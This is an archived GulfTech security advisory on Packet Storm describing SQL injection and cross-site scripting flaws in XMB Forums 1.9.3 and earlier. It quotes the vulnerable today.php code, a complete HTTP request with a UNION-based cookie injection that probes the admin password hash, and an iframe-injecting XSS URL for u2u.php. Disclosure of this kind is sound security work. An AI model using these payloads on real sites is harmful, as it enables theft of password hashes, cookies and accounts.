Twenty Year Anniversary

XMB-1.9.3.txt

XMB-1.9.3.txt
Posted Feb 16, 2006
Authored by James Bercegay | Site gulftech.org

XMB Forum versions less than or equal to 1.9.3 are vulnerable to SQL injection or XSS attacks.

tags | exploit, sql injection
MD5 | 3c7687372c754933f0fd7dc95fb875d9

XMB-1.9.3.txt

Change Mirror Download
##########################################################
# GulfTech Security Research February 12, 2006
##########################################################
# Vendor : XMB Software
# URL : http://www.xmbforum.com/
# Version : XMB Forums <= 1.9.3
# Risk : Multiple Vulnerabilities
##########################################################


Description:
XMB Forums is a popular forum software written in php and mysql
that allows you to open up your own online community or
messageboard. There are a number of security issues in XMB Forums
that may allow for an attacker to perform SQL injection attacks
or cross site scripting attacks against the vulnerable web
application. These types of attacks may allow for disclosure of
sensitive data such as cookie information or contents from the
underlying database.



SQL Injection:
There are a number of SQL Injection issues in XMB Forums. The
first of these issues I will talk about is in 'today.php' and
is present due to the lack of sanitation when attempting to
handle cookie data in regards to password protected forums.

if ( X_MEMBER ) {
// let's add fids for passworded forums that the user can access
$r2 = array();
foreach ($_COOKIE as $key=>$val) {
if (preg_match('#^fidpw([0-9]+)$#', $key, $fetch)) {
$r2[] = "(fid='$fetch[1]' AND password='$val')";
}
}
if (count($r2) > 0) {
$r = implode(' OR ', $r2);
$q = $db->query("SELECT fid FROM $table_forums WHERE $r");
while($f = $db->fetch_array($q)) {
$fids[] = $f['fid'];
}
}
}

The above code, which is taken from 'today.php' never sanitizes the variable
$val which makes SQL Injection possible.

GET /today.php HTTP/1.1
Host: xmb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)
Firefox/1.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://xmb/viewthread.php?tid=2&page=1
Cookie: xmblva=1137629907; xmbuser=james;
xmbpw=44cc344d25a2ffe540adbd5678e2394c;
fidpw0=') UNION SELECT uid FROM xmb_members WHERE uid=1 AND
MID(password,1,1)=2/*
Cache-Control: max-age=0

For example, the above request would show any topics from the last 24hrs
including ones the user does not have access to, and should not see, as
long as the user with the uid of 1 has a password hash that starts with
the number two. Otherwise only posts that the user has access to will be
shown. Also, in addition to this SQL Injection issue are a few others
that are a result of the $u2u_select array not being properly sanitized
before being passed to several functions. The vulnerable functions are
u2u_mod_delete(), u2u_mod_move(), and u2u_mod_markUnread(). These three
vulnerable function calls are present in u2u.inc.php



Cross Site Scripting:
In addition to the previously mentioned SQL Injection issues, there is
also a cross site scripting issue in the way the u2u feature handles
GPC data when composing messages etc.

http:///xmb/u2u.php?action=send&username=%22%3E%3Ciframe%3E

An attacker could use this vulnerability to steal a users cookie data
and possibly take control of the victims account.



Solution:
The vendor did not respond to our contact attempts.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00100-02122006

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    16 Files
  • 17
    Aug 17th
    22 Files
  • 18
    Aug 18th
    3 Files
  • 19
    Aug 19th
    3 Files
  • 20
    Aug 20th
    21 Files
  • 21
    Aug 21st
    7 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close